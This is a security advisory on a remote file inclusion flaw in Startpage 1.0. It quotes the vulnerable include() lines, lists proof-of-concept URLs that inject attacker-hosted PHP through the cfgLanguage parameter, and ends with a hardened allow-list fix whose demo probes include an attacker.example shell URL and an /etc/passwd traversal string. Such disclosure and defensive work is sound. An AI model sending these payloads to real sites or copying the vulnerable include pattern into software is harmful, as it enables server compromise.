Startpage <= 1.0 (cfgLanguage) Remote File Inclusion Vulnerability



--------------------------------------------------------------------------------------------
Startpage 1.0 cfgLanguage Remote File Inclusion
--------------------------------------------------------------------------------------------
Author : Sh3ll
Date : 2006/08/10
HomePage : http://www.sh3ll.ir
Contact : sh3ll[at]sh3ll[dot]ir
--------------------------------------------------------------------------------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Startpage
version : 1.0
Vendor : http://matthijs.draijer.org
Class : Remote File Inclusion
Risk : High
Summary :
Startpage v1.0 is a script which shows your favourite links.
--------------------------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~
The problem exists in edit.php, functions.php, new.php, PageBottom.php and PageTop.php,
which pass the variable $cfgLanguage to include() without declaring or initialising it first.
With register_globals enabled, a request parameter named cfgLanguage populates the variable,
so the attacker chooses what file is included. Two things to check before relying on this:
functions.php, new.php, PageBottom.php and PageTop.php include config.php before the language
file, so if config.php assigns $cfgLanguage unconditionally the request value is overwritten
there and only edit.php is reachable; and the include string carries the literal prefix
"language_", so a URL supplied in $cfgLanguage does not start the string and PHP will not
treat it as a stream wrapper. Confirm the include line in the shipped source matches what is
shown below before treating the PoC as a working remote include.
----------------------------------------edit.php--------------------------------------------
...
<?php
include ("language_$cfgLanguage.php");
?>
...
----------------------------------------functions.php---------------------------------------
...
<?php
include ("config.php");
include ("language_$cfgLanguage.php");
?>
...
----------------------------------------new.php---------------------------------------------
...
<?php
include ("config.php");
include ("functions.php");
include ("PageTop.php");
include ("language_$cfgLanguage.php");
connect_db();
?>
...
----------------------------------------PageBottom.php--------------------------------------
...
<?php
include ("config.php");
include ("language_$cfgLanguage.php");
?>
...
----------------------------------------PageTop.php-----------------------------------------
...
<?php
include ("config.php");
include ("language_$cfgLanguage.php");
?>
...
--------------------------------------------------------------------------------------------
PoC:
~~~
http://www.target.com/[Startpage]/edit.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/functions.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/new.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/PageBottom.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/PageTop.php?cfgLanguage=[Evil Script]
[Evil Script] stands for a URL to attacker-hosted PHP code; ending it with "?" turns the
appended ".php" into a query string. Remote includes require register_globals on the target
and allow_url_fopen (plus allow_url_include on PHP 5.2 and later) enabled.

Solution:
~~~~~~~~
Do not take $cfgLanguage from the request. Initialise it in config.php, validate it against
a fixed list of shipped language codes before building the include path in edit.php,
functions.php, new.php, PageBottom.php and PageTop.php, and run with register_globals off
(and allow_url_fopen / allow_url_include off where remote includes are not needed).
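The following is an added example, not Startpage's own code, showing one way to replace the
vulnerable include() described in the Vulnerability section with the validated version the
Solution calls for. The language codes in the allow-list and the file names are assumptions;
the function names are hypothetical. It targets PHP 7.1 or later.

```php
<?php
// Added example (not Startpage's code). Hardened replacement for
//   include ("language_$cfgLanguage.php");
// The language code is read from the request explicitly (no reliance on
// register_globals), checked against a fixed allow-list, and only then turned
// into a file name that the script itself builds.

// Allow-list of language codes the application ships. Assumed values; adjust
// to the real set of language_<code>.php files in the install.
const ALLOWED_LANGUAGES = ['en', 'nl', 'de'];
const DEFAULT_LANGUAGE  = 'en';

/**
 * Map an untrusted language value to a language file name, or null if the
 * value is not on the allow-list. Because the returned name is always
 * language_<code>.php with <code> taken from ALLOWED_LANGUAGES, traversal
 * sequences, null bytes and stream wrappers can never reach include().
 */
function language_file(?string $requested): ?string
{
    if ($requested === null) {
        return 'language_' . DEFAULT_LANGUAGE . '.php';
    }
    // Strict comparison: in_array() without the third argument uses loose
    // comparison, which lets values such as "0" match unexpectedly.
    if (!in_array($requested, ALLOWED_LANGUAGES, true)) {
        return null;
    }
    return 'language_' . $requested . '.php';
}

/**
 * Resolve the language file to an absolute path under $baseDir, confirm it
 * exists and still lies inside $baseDir, then include it. Any rejected value
 * falls back to the default language instead of reaching include().
 */
function load_language(string $baseDir, ?string $requested): string
{
    $file = language_file($requested) ?? language_file(DEFAULT_LANGUAGE);
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $file);
    // realpath() returns false for a missing file; the prefix check rejects
    // anything that resolved outside the install directory.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('language file missing or outside install dir');
    }
    include $path;
    return $path;
}

// Usage at the top of edit.php / PageTop.php etc., replacing the vulnerable
// line: $cfgLanguage is set from the request explicitly and validated.
$cfgLanguage = isset($_GET['cfgLanguage']) ? (string) $_GET['cfgLanguage'] : null;
// load_language(__DIR__, $cfgLanguage);

// Demonstration of the filter on constructed inputs (no files needed).
$probes = [
    'en',
    'http://attacker.example/shell.txt?',  // remote include attempt
    '../../../../etc/passwd',              // traversal attempt
    '0',                                   // loose-comparison probe
];
foreach ($probes as $p) {
    printf("%-40s -> %s\n", $p, language_file($p) ?? 'rejected');
}
```

Only the first probe yields a file name (language_en.php); the other three are rejected
before any path is built, which is the property the fix needs: the request decides which
of a fixed set of files is loaded, never the file name itself.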
--------------------------------------------------------------------------------------------
Note:
~~~~
Vendor contacted, but no response. Apply a quick patch yourself in the meantime.
--------------------------------------------------------------------------------------------
Shoutz:
~~~~~~
~ Special Greetz To My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams


